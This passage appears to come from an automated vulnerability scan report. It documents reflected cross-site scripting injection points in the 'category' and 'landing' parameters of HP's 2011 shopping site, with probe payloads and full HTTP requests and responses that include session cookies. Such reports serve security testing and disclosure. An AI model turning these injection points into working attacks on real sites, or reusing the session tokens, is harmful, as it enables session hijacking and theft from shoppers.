Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:56 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div id="BVReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_seriesd244c" a=b 5931038e062&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retr
...[SNIP]...

1.39. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3c95'%3bd4d924c3cbf was submitted in the category parameter. This input was echoed as d3c95';d4d924c3cbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_seriesd3c95'%3bd4d924c3cbf&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// get the catLevel, landing, category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_seriesd3c95';d4d924c3cbf';
var omni_catLevel = '3';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_lan
...[SNIP]...

1.40. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f2c"%3bab2d1bedb5f was submitted in the category parameter. This input was echoed as b0f2c";ab2d1bedb5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=b0f2c"%3bab2d1bedb5f&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:00 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:00 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:00 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223392

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

function readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=b0f2c";ab2d1bedb5f&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}

...[SNIP]...

1.41. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 692c8'%3bba9e50af53c was submitted in the landing parameter. This input was echoed as 692c8';ba9e50af53c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops692c8'%3bba9e50af53c&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:45 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:45 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
{
populateBV();
}

// get the catLevel, landing, category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops692c8';ba9e50af53c';
var omni_category = 'p7xt_series';
var omni_catLevel = '3';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landin
...[SNIP]...

1.42. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca318"%20a%3db%207c7a7a1fc2f was submitted in the landing parameter. This input was echoed as ca318" a=b 7c7a7a1fc2f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktopsca318"%20a%3db%207c7a7a1fc2f&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222564

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div id="BVReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktopsca318" a=b 7c7a7a1fc2f&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" t
...[SNIP]...

